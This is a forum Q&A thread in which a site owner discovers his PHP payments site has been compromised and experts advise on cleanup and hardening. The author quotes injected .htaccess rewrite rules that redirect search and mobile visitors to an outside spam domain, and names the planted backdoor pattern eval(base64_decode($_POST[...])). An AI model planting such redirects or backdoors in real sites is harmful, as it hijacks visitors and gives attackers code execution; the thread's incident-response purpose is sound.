Solved

website 302 redirect

Posted on 2014-07-28
8
310 Views
Last Modified: 2014-07-28
Hi

I am running a Centos 5, LAMP site. The problem is that one of the pages is being redirected to another page (not mine) that has a link. I think it is a hack.

This is being done on a 302 Found redirect :-

Found

The document has moved here.


The pages are part of my payments processing and so I have taken the site down while I resolve the problem.

I have tested the code and it is being executed correctly :-

   elseif ($pmeth == 'card') {
         //print_r ($inputdata);
          $url=$url_prefix."payments/card.php";
          $result=postArray($inputdata,$url);
          if ($result != 'ok') echo $result;
          exit;
However even if I rename card.php to xxx.php the redirect still happens. I don't know much about 302 redirects. How are they configured? Where do I start looking?

Thanks for any help.
0
Comment
Question by:philevans114
  • 4
  • 3
8 Comments
 
LVL 58

Expert Comment

by:Gary
ID: 40224805
Is this Apache? Check your htaccess and httpd.conf
Is this a CMS like Wordpress or your own code?
0
 
LVL 13

Expert Comment

by:duncanb7
ID: 40224864
Could you provide us more information   such as request and response header .
You can use the debugger tools from this site http://www.charlesproxy.com/download/

Duncan
0
 

Author Comment

by:philevans114
ID: 40224869
Thanks Gary.

Its my own PHP. 2 mins after posting I suddenly realised to check .htaccess. Its been altered with rewrites and redirects all over the place e.g.

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://doctor-store24x7.com [R,L]
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

and more...

I'm also finding eval(base64_decode($_POST[ etc in some of the php pages and uploaded pages with the same.

I don't now how they are getting in. I'm running CSF and LFD and clamav.

I'm about to change passwords etc.
0
 
LVL 58

Expert Comment

by:Gary
ID: 40224880
This
base64_decode

is your clue to being hacked.
As you have said - change all your passwords to something strong - that mean uppercase, lowercase number and symbols.
Check all your server logins, ftp, ssh etc and change them.
You need to lock down your server.

I would temporarily take your site off line if possible, or if you have a local copy then delete the online version and put your clean copy up. If not then you will have to go through each page and cleanse them.
0
Why You Should Analyze Threat Actor TTPs

After years of analyzing threat actor behavior, it’s become clear that at any given time there are specific tactics, techniques, and procedures (TTPs) that are particularly prevalent. By analyzing and understanding these TTPs, you can dramatically enhance your security program.

 

Author Comment

by:philevans114
ID: 40224948
Thanks Gary for the advice.

I've sanitised the code and have the site off-line now. I don't have a copy that I can easily upload.

I need to prevent them getting in but don't know how. I'm looking at installing CXS. I assume that the base64_decode  can inject code into pages somehow.

I need to do a bit more on EE to find out. I would welcome any ideas.
0
 
LVL 58

Accepted Solution

by:
Gary earned 500 total points
ID: 40224964
Without knowing how they got in...
Changing all your passwords is the first port of call
Any contact forms need to be checked for sanitizing data.
If you are using standard username/password SSH login then change it to certificate based and change the port - SSH is always under attack by hackers.
If you are using any plugins for check if they are updated - some of the easiest ways for hackers to get in.
Do you allow uploads? Are you ringfencing them
Are you running a firewall like CSF
0
 

Author Comment

by:philevans114
ID: 40225038
Hi Gary

Very helpful.

I've disable_function base64_decode in php.ini, changed passwords and am running csf. I need to look at the others things.

A good first start. Much appreciated.
0
 

Author Closing Comment

by:philevans114
ID: 40225041
Gary went beyond the initial question and provided some very useful support and advice.
0

Featured Post

Highfive + Dolby Voice = No More Audio Complaints!

Poor audio quality is one of the top reasons people don’t use video conferencing. Get the crispest, clearest audio powered by Dolby Voice in every meeting. Highfive and Dolby Voice deliver the best video conferencing and audio experience for every meeting and every room.

Join & Write a Comment

Objective of This Article In 1990’s, when I was a budding software professional, I had a lot of confusion about which stream or technology, I had to choose to build my career. In those days, I had lot of confusion like whether to choose System so…
The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
The purpose of this video is to demonstrate how to automatically show related posts at the bottom of a blog post in WordPress. This will be demonstrated using a Windows 8 PC. Plugin “Yet Another Related Posts Plugin” will be used. Go to your…
The purpose of this video is to demonstrate how to set up the permalinks on a WordPress Website. This will be demonstrated using a Windows 8 PC. Go to your WordPress login page. This will look like the following: mywebsite.com/wp-login.php : Go t…

705 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now